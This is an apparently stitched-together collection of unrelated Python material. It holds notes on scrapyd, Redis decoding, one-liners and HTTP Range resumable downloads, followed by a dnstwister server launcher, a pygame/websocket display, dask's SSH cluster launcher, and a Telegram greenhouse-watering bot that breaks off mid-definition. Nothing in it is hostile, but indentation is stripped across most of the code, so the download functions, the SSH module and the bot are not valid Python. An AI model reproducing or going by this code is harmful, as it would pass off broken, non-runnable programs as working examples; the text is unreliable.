url = http://192.168.191.137:6800/
project = sina
~~~
`From the spider project directory, upload the spider code with: scrapyd-deploy sina_spider -p sina`
`step 4: check daemon status: curl http://192.168.191.137:6800/daemonstatus.json`
`step 5: schedule a spider: curl http://192.168.191.137:6800/schedule.json -d project=sina -d spider=weibo_spider`
**scrapydweb:**
`pip install scrapydweb`
`run: scrapydweb`
`a scrapydweb_settings.py file is generated automatically; set SCRAPYDWEB_HOST=0.0.0.0`
# 17. Converting bytes read from Redis into a dict
~~~python
def convert(data):
    """Recursively decode bytes returned by redis-py into str."""
    if isinstance(data, bytes):
        return data.decode('ascii')
    if isinstance(data, dict):
        return dict(map(convert, data.items()))
    if isinstance(data, tuple):
        return tuple(map(convert, data))  # materialize; a bare map() would be a lazy iterator in Python 3
    return data
~~~
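A quick usage example, assuming a default redis-py client (which returns bytes):
~~~python
import redis

r = redis.Redis()            # decode_responses defaults to False, so values come back as bytes
raw = r.hgetall("user:1")    # e.g. {b'name': b'alice', b'age': b'30'}
print(convert(raw))          # {'name': 'alice', 'age': '30'}
~~~
Alternatively, constructing the client with `decode_responses=True` makes redis-py return `str` directly, and the helper becomes unnecessary.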
# 18. One-liners
* Print the 9x9 multiplication table in one line
~~~python
print('\n'.join([' '.join(['%s*%s=%-2s' % (y, x, x*y) for y in range(1, x+1)]) for x in range(1, 10)]))
~~~
* Print the Fibonacci sequence in one line
~~~python
print([x[0] for x in [(a[i][0], a.append([a[i][1], a[i][0]+a[i][1]])) for a in ([[1, 1]], ) for i in range(30)]])
~~~
# 19. Handy tools
Screenshots: Snipaste
Image viewer: Picasa3
Utility: FastStone Capture
# 20. Resumable downloads (HTTP Range)
* Older versions of the HTTP protocol did not support resuming; support was added in HTTP/1.1. Resumable downloads rely on the Range field of the request header, which is also the core mechanism behind "multi-threaded" download tools such as FlashGet and Thunder (迅雷).
* Range requests part of a resource (not counting the size of the response headers), measured in bytes and starting at 0.
If the server can honour it, it responds with 206 Partial Content.
If it cannot handle the Range header, it returns the whole resource with a 200 OK status (check for this before attempting a segmented download).
~~~python
import requests
from tqdm import tqdm
import os
def download_from_url(url, dst):
    response = requests.get(url, stream=True)  # stream=True so the large file is not loaded into memory at once
print(response.status_code)
    file_size = int(response.headers['content-length'])  # the content-length header gives the total file size
if os.path.exists(dst):
        first_byte = os.path.getsize(dst)  # size of the partially downloaded file, used to resume; if it does not exist, start from byte 0
else:
first_byte = 0
    if first_byte >= file_size:  # the local file is already complete
return file_size
header = {"Range": f"bytes={first_byte}-{file_size}"}
pbar = tqdm(
total=file_size, initial=first_byte,
unit='B', unit_scale=True, desc=dst)
    req = requests.get(url, headers=header, stream=True)  # request the remainder of the file
with(open(dst, 'ab')) as f:
        for chunk in req.iter_content(chunk_size=1024):  # read 1024 bytes per iteration
if chunk:
f.write(chunk)
pbar.update(1024)
pbar.close()
return file_size
if __name__ == '__main__':
url = "https://f.us.sinaimg.cn/003JuhEelx07v8gjXeXS01041200FozD0E010.mp4?label=mp4_720p&template=1280x720.23.0&Expires=1562142855&ssig=B%2BC3%2BWo%2Bh%2F&KID=unistore,video"
download_from_url(url, "1.mp4")
~~~
Optimizing the resumable download: concurrent downloads with aiohttp
~~~python
import aiohttp
import asyncio
import os
from tqdm import tqdm
async def fetch(session, url, dst, pbar=None, headers=None):
if headers:
async with session.get(url, headers=headers) as req:
with(open(dst, 'ab')) as f:
while True:
chunk = await req.content.read(1024)
if not chunk:
break
f.write(chunk)
pbar.update(1024)
pbar.close()
else:
async with session.get(url) as req:
return req
async def async_download_from_url(url, dst):
    '''Asynchronous resumable download.'''
async with aiohttp.connector.TCPConnector(limit=300, force_close=True, enable_cleanup_closed=True) as tc:
async with aiohttp.ClientSession(connector=tc) as session:
req = await fetch(session, url, dst)
file_size = int(req.headers['content-length'])
print(f"获取视频总长度:{file_size}")
if os.path.exists(dst):
first_byte = os.path.getsize(dst)
else:
first_byte = 0
if first_byte >= file_size:
return file_size
header = {"Range": f"bytes={first_byte}-{file_size}"}
pbar = tqdm(
total=file_size, initial=first_byte,
unit='B', unit_scale=True, desc=dst)
await fetch(session, url, dst, pbar=pbar, headers=header)
url = "https://f.us.sinaimg.cn/003JuhEelx07v8gjXeXS01041200FozD0E010.mp4?label=mp4_720p&template=1280x720.23.0&Expires=1562142855&ssig=B%2BC3%2BWo%2Bh%2F&KID=unistore,video"
task = [asyncio.ensure_future(async_download_from_url(url, f"{i}.mp4")) for i in range(1, 12)]
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.wait(task))
loop.close()
~~~
# 21. Excel data analysis
**Extracting every Nth row in Excel:**
=OFFSET($A$1,N*(ROW(A1)-1),,) --- change N to extract data every N rows.
|
local_server.py
|
"""Launch."""
import threading
import waitress
import werkzeug.serving
import build.build_fed as build_fed
@werkzeug.serving.run_with_reloader
def serve():
"""Run waitress, but reload with file system changes."""
def builder_thread():
build_fed.build('dnstwister/static/')
build_fed.monitor('dnstwister/static/')
threading.Thread(target=builder_thread).start()
import dnstwister
# Allow for template changes without manual restart.
# At least until https://github.com/pallets/flask/pull/1910 is merged...
dnstwister.app.jinja_env.auto_reload = True
waitress.serve(
dnstwister.app,
host='127.0.0.1',
port=5000,
)
|
main.py
|
import json
from threading import Thread
import pygame
import websocket
import time
from math import floor
from init_state import InitState
from utils import COLORS, get_sprite_surface
console_size = console_width, console_height = 320, 240
console_size_final = console_width * 4, console_height * 4
pixel_size = width, height = 160, 144
screen_size = (width * 4, height * 4)
ARROW = [
[0, 0, 0, 3, 0, 0, 0],
[0, 0, 3, 3, 3, 0, 0],
[0, 3, 3, 3, 3, 3, 0],
[3, 3, 3, 3, 3, 3, 3],
[0, 0, 3, 3, 3, 0, 0],
[0, 0, 3, 3, 3, 0, 0],
[0, 0, 3, 3, 3, 0, 0],
]
values = {
"up": 20,
"down": 10,
"left": 0,
"right": 50,
"connected": 100,
"selected": "up"
}
def on_message(ws, message):
global values
values = json.loads(message)
def on_close(ws):
print("### closed ###")
websocket.enableTrace(True)
ws = websocket.WebSocketApp("ws://0.0.0.0:8000/", on_message=on_message, on_close=on_close)
wst = Thread(target=ws.run_forever)
wst.daemon = True
wst.start()
conn_timeout = 5
while not ws.sock.connected and conn_timeout:
time.sleep(1)
conn_timeout -= 1
def main():
global values
msg_counter = 0
""" Set up the game and run the main game loop """
pygame.init()
clock = pygame.time.Clock()
main_surface = pygame.display.set_mode(console_size_final)
main_surface.fill(pygame.Color(100, 100, 100))
buffer = pygame.Surface(pixel_size)
arrows_buffer = pygame.Surface((100, 144))
state = InitState(width, height)
font = pygame.font.Font('fonts/prstart.ttf', 8)
arrow_up = get_sprite_surface(ARROW)
arrow_up.set_colorkey(COLORS[0])
arrows = {
'up': arrow_up,
'down': pygame.transform.rotate(arrow_up, 90 * 2),
'left': pygame.transform.rotate(arrow_up, 90),
'right': pygame.transform.rotate(arrow_up, 90*3),
}
big_arrows = {k: pygame.transform.scale2x(v) for k, v in arrows.items()}
while True:
ev = pygame.event.poll()
if ev.type == pygame.QUIT:
break
selected = values["selected"]
state.update(selected)
state.draw(buffer)
state = state.get_next_state()
buffer.set_alpha(110)
main_surface.blit(pygame.transform.scale(buffer, screen_size), (40, 40))
arrows_buffer.fill(COLORS[0])
y = 4
x = 4
for i in 'up', 'down', 'left', 'right':
txt = "{0:06d}".format(values[i])
x = 4
arrows_buffer.blit(arrows[i], (x, y))
x += arrows[i].get_width() + 4
arrows_buffer.blit(font.render(txt, False, COLORS[2]), (x, y))
y += font.size(txt)[1]
y +=10
x = (arrows_buffer.get_width() - big_arrows['up'].get_width())/2
if selected == 'up':
pygame.draw.circle(arrows_buffer, COLORS[1], (floor(x + big_arrows['up'].get_width()/2), floor(y + big_arrows['up'].get_height()/2)), 10)
arrows_buffer.blit(big_arrows['up'], (x, y))
y += 10 + big_arrows['up'].get_height()
x = (arrows_buffer.get_width() - big_arrows['up'].get_width()*4)/2
if selected == 'left':
pygame.draw.circle(arrows_buffer, COLORS[1], (floor(x + big_arrows['up'].get_width()/2), floor(y + big_arrows['up'].get_height()/2)), 10)
arrows_buffer.blit(big_arrows['left'], (x, y))
x = (arrows_buffer.get_width() + big_arrows['up'].get_width()*2)/2
if selected == 'right':
pygame.draw.circle(arrows_buffer, COLORS[1], (floor(x + big_arrows['up'].get_width()/2), floor(y + big_arrows['up'].get_height()/2)), 10)
arrows_buffer.blit(big_arrows['right'], (x, y))
y += 10 + big_arrows['up'].get_height()
x = (arrows_buffer.get_width() - big_arrows['up'].get_width())/2
if selected == 'down':
pygame.draw.circle(arrows_buffer, COLORS[1], (floor(x + big_arrows['up'].get_width()/2), floor(y + big_arrows['up'].get_height()/2)), 10)
arrows_buffer.blit(big_arrows['down'], (x, y))
arrows_buffer.set_alpha(110)
main_surface.blit(pygame.transform.scale(arrows_buffer, (100 * 4, 144 * 4)), (screen_size[0] + 40 * 2, 40))
pygame.display.flip()
# ws.send('Hello world %d' % msg_counter)
msg_counter += 1
clock.tick(30)
pygame.quit() # Once we leave the loop, close the window.
main()
|
old_ssh.py
|
import logging
import os
import socket
import sys
import time
import traceback
from queue import Queue
from threading import Thread
from tlz import merge
from tornado import gen
logger = logging.getLogger(__name__)
# These are handy for creating colorful terminal output to enhance readability
# of the output generated by dask-ssh.
class bcolors:
HEADER = "\033[95m"
OKBLUE = "\033[94m"
OKGREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
def async_ssh(cmd_dict):
import paramiko
from paramiko.buffered_pipe import PipeTimeout
from paramiko.ssh_exception import PasswordRequiredException, SSHException
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
retries = 0
while True: # Be robust to transient SSH failures.
try:
# Set paramiko logging to WARN or higher to squelch INFO messages.
logging.getLogger("paramiko").setLevel(logging.WARN)
ssh.connect(
hostname=cmd_dict["address"],
username=cmd_dict["ssh_username"],
port=cmd_dict["ssh_port"],
key_filename=cmd_dict["ssh_private_key"],
compress=True,
timeout=30,
banner_timeout=30,
) # Helps prevent timeouts when many concurrent ssh connections are opened.
# Connection successful, break out of while loop
break
except (SSHException, PasswordRequiredException) as e:
print(
"[ dask-ssh ] : "
+ bcolors.FAIL
+ "SSH connection error when connecting to {addr}:{port}"
"to run '{cmd}'".format(
addr=cmd_dict["address"],
port=cmd_dict["ssh_port"],
cmd=cmd_dict["cmd"],
)
+ bcolors.ENDC
)
print(
bcolors.FAIL
+ " SSH reported this exception: "
+ str(e)
+ bcolors.ENDC
)
# Print an exception traceback
traceback.print_exc()
# Transient SSH errors can occur when many SSH connections are
# simultaneously opened to the same server. This makes a few
# attempts to retry.
retries += 1
if retries >= 3:
print(
"[ dask-ssh ] : "
+ bcolors.FAIL
+ "SSH connection failed after 3 retries. Exiting."
+ bcolors.ENDC
)
# Connection failed after multiple attempts. Terminate this thread.
os._exit(1)
# Wait a moment before retrying
print(
" "
+ bcolors.FAIL
+ f"Retrying... (attempt {retries}/3)"
+ bcolors.ENDC
)
time.sleep(1)
# Execute the command, and grab file handles for stdout and stderr. Note
# that we run the command using the user's default shell, but force it to
# run in an interactive login shell, which hopefully ensures that all of the
# user's normal environment variables (via the dot files) have been loaded
# before the command is run. This should help to ensure that important
# aspects of the environment like PATH and PYTHONPATH are configured.
print("[ {label} ] : {cmd}".format(label=cmd_dict["label"], cmd=cmd_dict["cmd"]))
stdin, stdout, stderr = ssh.exec_command(
"$SHELL -i -c '" + cmd_dict["cmd"] + "'", get_pty=True
)
# Set up channel timeout (which we rely on below to make readline() non-blocking)
channel = stdout.channel
channel.settimeout(0.1)
def read_from_stdout():
"""
Read stdout stream, time out if necessary.
"""
try:
line = stdout.readline()
while len(line) > 0: # Loops until a timeout exception occurs
line = line.rstrip()
logger.debug("stdout from ssh channel: %s", line)
cmd_dict["output_queue"].put(
"[ {label} ] : {output}".format(
label=cmd_dict["label"], output=line
)
)
line = stdout.readline()
except (PipeTimeout, socket.timeout):
pass
def read_from_stderr():
"""
Read stderr stream, time out if necessary.
"""
try:
line = stderr.readline()
while len(line) > 0:
line = line.rstrip()
logger.debug("stderr from ssh channel: %s", line)
cmd_dict["output_queue"].put(
"[ {label} ] : ".format(label=cmd_dict["label"])
+ bcolors.FAIL
+ line
+ bcolors.ENDC
)
line = stderr.readline()
except (PipeTimeout, socket.timeout):
pass
def communicate():
"""
Communicate a little bit, without blocking too long.
Return True if the command ended.
"""
read_from_stdout()
read_from_stderr()
# Check to see if the process has exited. If it has, we let this thread
# terminate.
if channel.exit_status_ready():
exit_status = channel.recv_exit_status()
cmd_dict["output_queue"].put(
"[ {label} ] : ".format(label=cmd_dict["label"])
+ bcolors.FAIL
+ "remote process exited with exit status "
+ str(exit_status)
+ bcolors.ENDC
)
return True
# Get transport to current SSH client
transport = ssh.get_transport()
# Wait for a message on the input_queue. Any message received signals this
# thread to shut itself down.
while cmd_dict["input_queue"].empty():
# Kill some time so that this thread does not hog the CPU.
time.sleep(1.0)
# Send noise down the pipe to keep connection active
transport.send_ignore()
if communicate():
break
# Ctrl-C the executing command and wait a bit for command to end cleanly
start = time.time()
while time.time() < start + 5.0:
channel.send(b"\x03") # Ctrl-C
if communicate():
break
time.sleep(1.0)
# Shutdown the channel, and close the SSH connection
channel.close()
ssh.close()
def start_scheduler(
logdir, addr, port, ssh_username, ssh_port, ssh_private_key, remote_python=None
):
cmd = "{python} -m distributed.cli.dask_scheduler --port {port}".format(
python=remote_python or sys.executable, port=port
)
# Optionally re-direct stdout and stderr to a logfile
if logdir is not None:
cmd = f"mkdir -p {logdir} && {cmd}"
cmd += "&> {logdir}/dask_scheduler_{addr}:{port}.log".format(
addr=addr, port=port, logdir=logdir
)
# Format output labels we can prepend to each line of output, and create
# a 'status' key to keep track of jobs that terminate prematurely.
label = f"{bcolors.BOLD}scheduler {addr}:{port}{bcolors.ENDC}"
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {
"cmd": cmd,
"label": label,
"address": addr,
"port": port,
"input_queue": input_queue,
"output_queue": output_queue,
"ssh_username": ssh_username,
"ssh_port": ssh_port,
"ssh_private_key": ssh_private_key,
}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {"thread": thread})
def start_worker(
logdir,
scheduler_addr,
scheduler_port,
worker_addr,
nthreads,
nprocs,
ssh_username,
ssh_port,
ssh_private_key,
nohost,
memory_limit,
worker_port,
nanny_port,
remote_python=None,
remote_dask_worker="distributed.cli.dask_worker",
local_directory=None,
):
cmd = (
"{python} -m {remote_dask_worker} "
"{scheduler_addr}:{scheduler_port} "
"--nthreads {nthreads}" + (" --nprocs {nprocs}" if nprocs != 1 else "")
)
if not nohost:
cmd += " --host {worker_addr}"
if memory_limit:
cmd += " --memory-limit {memory_limit}"
if worker_port:
cmd += " --worker-port {worker_port}"
if nanny_port:
cmd += " --nanny-port {nanny_port}"
cmd = cmd.format(
python=remote_python or sys.executable,
remote_dask_worker=remote_dask_worker,
scheduler_addr=scheduler_addr,
scheduler_port=scheduler_port,
worker_addr=worker_addr,
nthreads=nthreads,
nprocs=nprocs,
memory_limit=memory_limit,
worker_port=worker_port,
nanny_port=nanny_port,
)
if local_directory is not None:
cmd += " --local-directory {local_directory}".format(
local_directory=local_directory
)
# Optionally redirect stdout and stderr to a logfile
if logdir is not None:
cmd = f"mkdir -p {logdir} && {cmd}"
cmd += "&> {logdir}/dask_scheduler_{addr}.log".format(
addr=worker_addr, logdir=logdir
)
label = f"worker {worker_addr}"
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {
"cmd": cmd,
"label": label,
"address": worker_addr,
"input_queue": input_queue,
"output_queue": output_queue,
"ssh_username": ssh_username,
"ssh_port": ssh_port,
"ssh_private_key": ssh_private_key,
}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {"thread": thread})
class SSHCluster:
def __init__(
self,
scheduler_addr,
scheduler_port,
worker_addrs,
nthreads=0,
nprocs=1,
ssh_username=None,
ssh_port=22,
ssh_private_key=None,
nohost=False,
logdir=None,
remote_python=None,
memory_limit=None,
worker_port=None,
nanny_port=None,
remote_dask_worker="distributed.cli.dask_worker",
local_directory=None,
):
self.scheduler_addr = scheduler_addr
self.scheduler_port = scheduler_port
self.nthreads = nthreads
self.nprocs = nprocs
self.ssh_username = ssh_username
self.ssh_port = ssh_port
self.ssh_private_key = ssh_private_key
self.nohost = nohost
self.remote_python = remote_python
self.memory_limit = memory_limit
self.worker_port = worker_port
self.nanny_port = nanny_port
self.remote_dask_worker = remote_dask_worker
self.local_directory = local_directory
# Generate a universal timestamp to use for log files
import datetime
if logdir is not None:
logdir = os.path.join(
logdir,
"dask-ssh_" + datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S"),
)
print(
bcolors.WARNING + "Output will be redirected to logfiles "
'stored locally on individual worker nodes under "{logdir}".'.format(
logdir=logdir
)
+ bcolors.ENDC
)
self.logdir = logdir
# Keep track of all running threads
self.threads = []
# Start the scheduler node
self.scheduler = start_scheduler(
logdir,
scheduler_addr,
scheduler_port,
ssh_username,
ssh_port,
ssh_private_key,
remote_python,
)
# Start worker nodes
self.workers = []
for i, addr in enumerate(worker_addrs):
self.add_worker(addr)
@gen.coroutine
def _start(self):
pass
@property
def scheduler_address(self):
return "%s:%d" % (self.scheduler_addr, self.scheduler_port)
def monitor_remote_processes(self):
# Form a list containing all processes, since we treat them equally from here on out.
all_processes = [self.scheduler] + self.workers
try:
while True:
for process in all_processes:
while not process["output_queue"].empty():
print(process["output_queue"].get())
# Kill some time and free up CPU before starting the next sweep
# through the processes.
time.sleep(0.1)
# end while true
except KeyboardInterrupt:
pass # Return execution to the calling process
def add_worker(self, address):
self.workers.append(
start_worker(
self.logdir,
self.scheduler_addr,
self.scheduler_port,
address,
self.nthreads,
self.nprocs,
self.ssh_username,
self.ssh_port,
self.ssh_private_key,
self.nohost,
self.memory_limit,
self.worker_port,
self.nanny_port,
self.remote_python,
self.remote_dask_worker,
self.local_directory,
)
)
def shutdown(self):
all_processes = [self.scheduler] + self.workers
for process in all_processes:
process["input_queue"].put("shutdown")
process["thread"].join()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
|
greenhouse.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# greenhouse.py
"""
main script for greenhouse bot
using telegram.ext as Python framework for Telegram Bot API
https://core.telegram.org/api#bot-api
original: author: Stefan Weigert http://www.stefan-weigert.de/php_loader/raspi.php
adapted: Thomas Kaulke, kaulketh@gmail.com
"""
from __future__ import absolute_import
import threading
import os
import time
import utils.utils as utils
import conf
import logger
import peripherals.dht.dht as dht
import peripherals.temperature as core
import utils.stop_and_restart as stop_and_restart
import peripherals.four_digit.display as display
import peripherals.monitor as monitor
from telegram import ReplyKeyboardMarkup, ReplyKeyboardRemove, ParseMode, InlineKeyboardButton, InlineKeyboardMarkup
from telegram.ext import Updater, CommandHandler, RegexHandler, ConversationHandler, CallbackQueryHandler
from telegram.ext.dispatcher import run_async
logger = logger.get_logger()
thread = threading.Thread(target=monitor.main, name='MainBot temperature monitoring')
thread.start()
lib = conf.lib
SELECTION, DURATION, GROUPING = range(3)
list_of_admins = conf.admins
token = conf.token
target = lib.empty
water_time = lib.empty
user_id = lib.empty
jq = None
timer_job = None
selection = ()
markup1 = ReplyKeyboardMarkup(conf.kb1, resize_keyboard=True, one_time_keyboard=True)
markup2 = ReplyKeyboardMarkup(conf.kb2, resize_keyboard=True, one_time_keyboard=True)
markup3 = ReplyKeyboardMarkup(conf.kb3, resize_keyboard=True, one_time_keyboard=True)
# Start info
def __init_bot_set_pins():
logger.info('Initializing...')
utils.set_pins()
__all_off()
display.show_standby()
return
# start bot
def __start(bot, update):
global user_id
try:
user_id = update.message.from_user.id
except (NameError, AttributeError):
try:
user_id = update.inline_query.from_user.id
except (NameError, AttributeError):
try:
user_id = update.chosen_inline_result.from_user.id
except (NameError, AttributeError):
try:
user_id = update.callback_query.from_user.id
except (NameError, AttributeError):
return ConversationHandler.END
if user_id not in list_of_admins:
display.show_stop()
logger.warning('Not allowed access by: {0} - {1},{2}'.format(
str(user_id), update.message.from_user.last_name, update.message.from_user.first_name))
__reply(update, lib.private_warning.format(update.message.from_user.first_name, update.message.chat_id))
return ConversationHandler.END
else:
display.show_run()
logger.info('Started...')
__message_values(update)
__cam_on()
display.show_ready()
__reply(
update,
'{0}{1}{2}'.format(lib.msg_welcome.format(update.message.from_user.first_name), lib.space, lib.msg_choice),
markup1)
logger.info('Bot usage: {0} - {1},{2}'.format(
str(user_id), update.message.from_user.last_name, update.message.from_user.first_name))
display.show_off()
__start_standby_timer(bot, update)
return SELECTION
# select targets
def __selection(bot, update):
global target
target = update.message.text
__stop_standby_timer(bot, update)
if target == str(lib.panic):
logger.info('Panic mode called.')
__reply(update, lib.msg_panic, ReplyKeyboardRemove())
os.system(conf.run_extended_greenhouse + str(user_id))
elif target == str(lib.live_stream):
logger.info('Live URL requested.')
__reply(update, lib.msg_live.format(str(conf.live)), markup1)
__start_standby_timer(bot, update)
return SELECTION
elif target == str(lib.reload):
logger.info('Refresh values requested.')
__message_values(update)
__start_standby_timer(bot, update)
return SELECTION
else:
return __selected_target(bot, update, target)
def __selected_target(bot, update, selected_target):
__reply(update, lib.msg_duration.format(selected_target), markup2)
logger.info('Selection: {0}'.format(str(selected_target)))
__start_standby_timer(bot, update)
return DURATION
# end: select targets
# [#31] grouping
def __grouping(bot, update, chat_data):
global selection
query = update.callback_query
btn_click = str(query.data)
if not (btn_click == str(lib.btn_finished) or btn_click == str(lib.cancel)):
if not selection.__contains__(int(btn_click)):
__stop_standby_timer(bot, update)
selection += (int(btn_click),)
bot.edit_message_text(text=lib.msg_grouping_selection.format(selection),
chat_id=query.message.chat_id,
message_id=query.message.message_id,
parse_mode=ParseMode.MARKDOWN,
reply_markup=reply_markup)
__start_standby_timer(bot, update)
elif btn_click == str(lib.btn_finished) and len(selection) > 0:
__stop_standby_timer(bot, update)
global target
target = lib.grouping
bot.edit_message_text(text=lib.msg_grouping_selection.format(selection),
chat_id=query.message.chat_id,
message_id=query.message.message_id,
parse_mode=ParseMode.MARKDOWN)
bot.send_message(text=lib.msg_duration.format(target + str(selection)),
chat_id=query.message.chat_id,
parse_mode=ParseMode.MARKDOWN,
reply_markup=markup2)
logger.info('Selected: {0} {1}'.format(str(target), str(selection)))
__start_standby_timer(bot, update)
return DURATION
elif btn_click == lib.cancel:
__stop_standby_timer(bot, update)
selection = ()
bot.delete_message(chat_id=query.message.chat_id,
message_id=query.message.message_id)
bot.send_message(text=lib.msg_new_choice,
chat_id=query.message.chat_id,
parse_mode=ParseMode.MARKDOWN,
reply_markup=markup1)
__start_standby_timer(bot, update)
return SELECTION
def __group_menu(bot, update):
global selection
selection = ()
inline_keyboard = [
[__get_btn(lib.channel_1, conf.RELAY_01), __get_btn(lib.channel_2, conf.RELAY_02),
__get_btn(lib.channel_3, conf.RELAY_03), __get_btn(lib.channel_4, conf.RELAY_04)],
[__get_btn(lib.channel_5, conf.RELAY_05), __get_btn(lib.channel_6, conf.RELAY_06),
__get_btn(lib.channel_7, conf.RELAY_07), __get_btn(lib.channel_8, conf.RELAY_08)],
[InlineKeyboardButton(lib.btn_finished, callback_data=lib.btn_finished),
InlineKeyboardButton(lib.btn_cancel, callback_data=lib.btn_cancel)]
]
global reply_markup
reply_markup = InlineKeyboardMarkup(inline_keyboard)
__reply(update, lib.msg_grouping, reply_markup)
logger.info('Grouping called.')
return GROUPING
def __get_btn(text, callback):
return InlineKeyboardButton('{0} ({1})'.format(text, callback), callback_data=callback)
# end: grouping
# water duration
def __duration(bot, update):
global water_time
global g_duration_update
g_duration_update = update
water_time = update.message.text
if water_time == str(lib.cancel):
__reply(update, lib.msg_new_choice, markup1)
logger.info(lib.msg_new_choice)
elif water_time == str(lib.panic):
__reply(update, lib.msg_panic, ReplyKeyboardRemove())
logger.info(lib.msg_panic)
os.system(conf.run_extended_greenhouse + str(user_id))
elif target == str(lib.channel_1):
display.show_switch_channel_duration(1, int(water_time))
__water(bot, update, conf.RELAY_01)
elif target == str(lib.channel_2):
display.show_switch_channel_duration(2, int(water_time))
__water(bot, update, conf.RELAY_02)
elif target == str(lib.channel_3):
display.show_switch_channel_duration(3, int(water_time))
__water(bot, update, conf.RELAY_03)
elif target == str(lib.channel_4):
display.show_switch_channel_duration(4, int(water_time))
__water(bot, update, conf.RELAY_04)
elif target == str(lib.channel_5):
display.show_switch_channel_duration(5, int(water_time))
__water(bot, update, conf.RELAY_05)
elif target == str(lib.channel_6):
display.show_switch_channel_duration(6, int(water_time))
__water(bot, update, conf.RELAY_06)
elif target == str(lib.channel_7):
display.show_switch_channel_duration(7, int(water_time))
__water(bot, update, conf.RELAY_07)
elif target == str(lib.channel_8):
display.show_switch_channel_duration(8, int(water_time))
__water(bot, update, conf.RELAY_08)
elif target == str(lib.grouping):
display.show_switch_group_duration(int(water_time))
__water_group(bot, update, selection)
else:
__reply(update, lib.msg_choice, markup1)
return SELECTION
# end: duration
# watering targets
def __all_off():
logger.info('All off.')
for relay in conf.ALL:
utils.switch_out_high(relay)
return
@run_async
def __water(bot, update, channel):
__stop_standby_timer(bot, update)
logger.info('Toggle {0} , Duration {1}'.format(str(channel), str(water_time)))
__reply(update, lib.water_on.format(target, water_time), markup3)
utils.switch_out_low(channel)
time.sleep(int(water_time) * int(lib.time_conversion))
utils.switch_out_high(channel)
__reply(update,
'{0}{1}{2}'.format(__timestamp(), lib.water_off.format(target, water_time), lib.msg_new_choice), markup1)
display.show_off()
__start_standby_timer(bot, update)
return
@run_async
def __water_group(bot, update, group):
__stop_standby_timer(bot, update)
logger.info('Toggle {0} , Duration {1}'.format(str(group), str(water_time)))
__reply(update, lib.water_on.format(target, water_time), markup3)
for channel in group:
utils.switch_out_low(channel)
time.sleep((int(water_time) * int(lib.time_conversion)))
for channel in group:
utils.switch_out_high(channel)
__reply(update,
'{0}{1}{2}'.format(__timestamp(), lib.water_off.format(target, water_time), lib.msg_new_choice), markup1)
display.show_off()
__start_standby_timer(bot, update)
return
# end watering targets
# get humidity and temperature values
def __message_values(update):
time.sleep(3)
""" avoid refresh intervals shorter than 3 seconds! """
dht.get_values()
if dht.temperature == 0:
temp = (lib.temp + lib.colon_space + '------')
else:
temp = (lib.temp + lib.colon_space + conf.temp_format).format(dht.temperature)
if dht.humidity == 0:
hum = (lib.hum + lib.colon_space + '------')
else:
hum = (lib.hum + lib.colon_space + conf.hum_format).format(dht.humidity)
core_temp = (lib.core + lib.colon_space + core.get_temperature())
__reply(update, lib.msg_temperature.format(__start_time(), temp, hum, core_temp), markup1)
return
# stop bot
def __stop(bot, update):
__all_off()
__stop_standby_timer(bot, update)
logger.info('Stopped.')
__cam_off()
display.show_stop()
__reply(update, lib.msg_stop, ReplyKeyboardRemove())
time.sleep(2)
display.show_standby()
return ConversationHandler.END
# [#39] Implement emergency stop
@run_async
def __emergency_stop_handler(bot, update, chat_data):
emergency = update.message.text
if not emergency:
return
if emergency == lib.emergency_stop:
__all_off()
__start_emergency_stop(bot, g_duration_update)
def __start_emergency_stop(bot, update):
logger.warning("Initialize emergency stop immediately.")
global emergency_job
emergency_job = jq.run_once(__job_stop_and_restart, 0, context=update)
return
# end: emergency stop
# [#30] implement standby init after given time without user activity
def __start_standby_timer(bot, update):
logger.info("Init standby timer of {0} seconds, added to queue.".format(conf.standby_timeout))
global timer_job
timer_job = jq.run_once(__job_stop_and_restart, conf.standby_timeout, context=update)
return
def __stop_standby_timer(bot, update):
timer_job.schedule_removal()
logger.info("Timer job removed from the queue.")
return
# end: standby
# job to stop and restart application
def __job_stop_and_restart(bot, job):
logger.info("Job: Stop and restart called!")
stop_and_restart.stop_and_restart(job.context)
return
# error
def __error(bot, update, e):
logger.error('Update "{0}" caused error "{1}"'.format(update, e))
try:
display.show_error()
__cam_off()
__all_off()
utils.GPIO.cleanup()
except Exception:
logger.warning('Any error occurs!')
return ConversationHandler.END
# time stamps
def __timestamp():
return utils.get_timestamp_line()
def __start_time():
return utils.get_timestamp()
# end: time stamps
# camera
def __cam_on():
logger.info('Enable camera module.')
os.system(conf.enable_camera)
return
def __cam_off():
logger.info('Disable camera module.')
os.system(conf.disable_camera)
return
# end: camera
# release info
def __message_release_info(bot, update):
__reply(update, '`' + utils.get_release_info() + '`')
return
# reply message
def __reply(update, text, markup=None):
if markup is None:
update.message.reply_text(text, parse_mode=ParseMode.MARKDOWN)
else:
update.message.reply_text(text, parse_mode=ParseMode.MARKDOWN, reply_markup=markup)
return
def main():
__init_bot_set_pins()
global updater
updater = Updater(token)
global jq
jq = updater.job_queue
logger.info('Init job queue.')
dp = updater.dispatcher
help_handler = CommandHandler('help', __message_release_info)
emergency_stop_handler = RegexHandler('^{0}$'.format(str(lib.emergency_stop)),
__emergency_stop_handler,
pass_chat_data=True)
ch = ConversationHandler(
entry_points=[CommandHandler('start', __start)],
states={
SELECTION: [RegexHandler('^({0}|{1}|{2}|{3}|{4}|{5}|{6}|{7}|{8}|{9}|{10})$'.format(
str(lib.channel_1), str(lib.channel_2), str(lib.channel_3), str(lib.channel_4),
str(lib.channel_5), str(lib.channel_6), str(lib.channel_7), str(lib.channel_8),
str(lib.panic), str(lib.live_stream), str(lib.reload)),
__selection),
RegexHandler('^{0}$'.format(lib.stop_bot), __stop),
RegexHandler('^{0}$'.format(lib.grouping), __group_menu)],
